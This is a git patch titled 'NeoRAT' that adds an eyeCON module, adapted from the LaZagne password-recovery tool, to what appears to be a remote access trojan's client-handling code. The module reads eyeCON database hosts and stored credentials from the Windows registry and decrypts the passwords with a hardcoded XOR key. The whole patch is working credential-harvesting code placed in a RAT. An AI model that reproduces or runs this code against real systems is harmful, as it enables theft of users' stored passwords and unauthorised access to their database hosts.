From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/multimedia/__init__.py       |  0
 .../lazagne/softwares/multimedia/eyecon.py         | 98 ++++++++++++++++++++++
 2 files changed, 98 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/multimedia/__init__.py
 create mode 100644 foreign/client_handling/lazagne/softwares/multimedia/eyecon.py

(limited to 'foreign/client_handling/lazagne/softwares/multimedia')

diff --git a/foreign/client_handling/lazagne/softwares/multimedia/__init__.py b/foreign/client_handling/lazagne/softwares/multimedia/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/foreign/client_handling/lazagne/softwares/multimedia/eyecon.py b/foreign/client_handling/lazagne/softwares/multimedia/eyecon.py
new file mode 100644
index 0000000..1fa7a66
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/multimedia/eyecon.py
@@ -0,0 +1,98 @@
+# -*- coding: utf-8 -*-
+import codecs
+
+try:
+    import _winreg as winreg
+except ImportError:
+    import winreg
+
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import *
+
+
+class EyeCON(ModuleInfo):
+    """
+    eyeCON software WAll management software
+    infos at http://www.eyevis.de/en/products/wall-management-software.html
+    """
+    def __init__(self):
+        self.hex_key = [ 35, 231, 64, 111, 100, 72, 95, 65, 68, 51, 52, 70, 67, 51, 65, 95, 54, 55, 50, 48, 95, 49, 49,
+             68, 54, 95, 65, 48, 53, 50, 95, 48, 48, 48, 52, 55, 54, 65, 48, 70, 66, 53, 66, 65, 70, 88, 95, 76, 79, 71,
+             73, 49, 76, 115, 107, 100, 85, 108, 107, 106, 102, 100, 109, 32, 50, 102, 115, 100, 102, 102, 32, 102, 119,
+             115, 38, 78, 68, 76, 76, 95, 72, 95, 95, 0 ]
+        ModuleInfo.__init__(self, name='EyeCon', category='multimedia')
+
+    def deobfuscate(self, ciphered_str):
+        return b''.join([chr_or_byte(char_to_int(c) ^ k) for c, k in zip(codecs.decode(ciphered_str, 'hex'), self.hex_key)])
+
+    def get_db_hosts(self):
+        hosts = []
+        paths = (
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\WOW6432Node\\eyevis\\eyeDB', 'DB1'),
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\WOW6432Node\\eyevis\\eyeDB', 'DB2'),
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\WOW6432Node\\eyevis\\eyeDB', 'DB3'),
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\eyevis\\eyeDB', 'DB1'),
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\eyevis\\eyeDB', 'DB2'),
+            ('EyeCON DB Host', HKEY_LOCAL_MACHINE, 'SOFTWARE\\eyevis\\eyeDB', 'DB3'),
+        )
+        for path in paths:
+            try:
+                hkey = OpenKey(path[1], path[2])
+                reg_key = winreg.QueryValueEx(hkey, path[3])[0]
+                if reg_key:
+                    hosts += [reg_key]
+            except Exception:
+                # skipping if value doesn't exist
+                # self.debug(u'Problems with key:: {reg_key}'.format(reg_key=path[1]+path[2]))
+                pass
+        return hosts
+
+    def credentials_from_registry(self):
+        found_passwords = []
+        password_path = (
+            {
+                'app': 'EyeCON', 'reg_root': HKEY_LOCAL_MACHINE,
+                'reg_path': 'SOFTWARE\\WOW6432Node\\eyevis\\eyetool\\Default',
+                'user_key': 'registered', 'password_key': 'connection'
+            },
+            {
+                'app': 'EyeCON', 'reg_root': HKEY_LOCAL_MACHINE,
+                'reg_path': 'SOFTWARE\\eyevis\\eyetool\\Default',
+                'user_key': 'registered', 'password_key': 'connection'
+            },
+        )
+
+        for path in password_path:
+            values = {}
+            try:
+                try:
+                    hkey = OpenKey(path['reg_root'], path['reg_path'])
+                    reg_user_key = winreg.QueryValueEx(hkey, path['user_key'])[0]
+                    reg_password_key = winreg.QueryValueEx(hkey, path['password_key'])[0]
+                except Exception:
+                    self.debug(u'Problems with key:: {reg_key}'.format(reg_key=path['reg_root'] + path['reg_path']))
+                    continue
+
+                try:
+                    user = self.deobfuscate(reg_user_key)
+                except Exception:
+                    self.info(u'Problems with deobfuscate user : {reg_key}'.format(reg_key=path['reg_path']))
+                    continue
+
+                try:
+                    password = self.deobfuscate(reg_password_key)
+                except Exception:
+                    self.info(u'Problems with deobfuscate password : {reg_key}'.format(reg_key=path['reg_path']))
+                    continue
+
+                found_passwords.append({'username': user, 'password': password})
+            except Exception:
+                pass
+        return found_passwords
+
+    def run(self):
+        hosts = self.get_db_hosts()
+        credentials = self.credentials_from_registry()
+        for cred in credentials:
+            cred['host(s)'] = b', '.join(hosts)
+        return credentials
-- 
cgit v1.2.3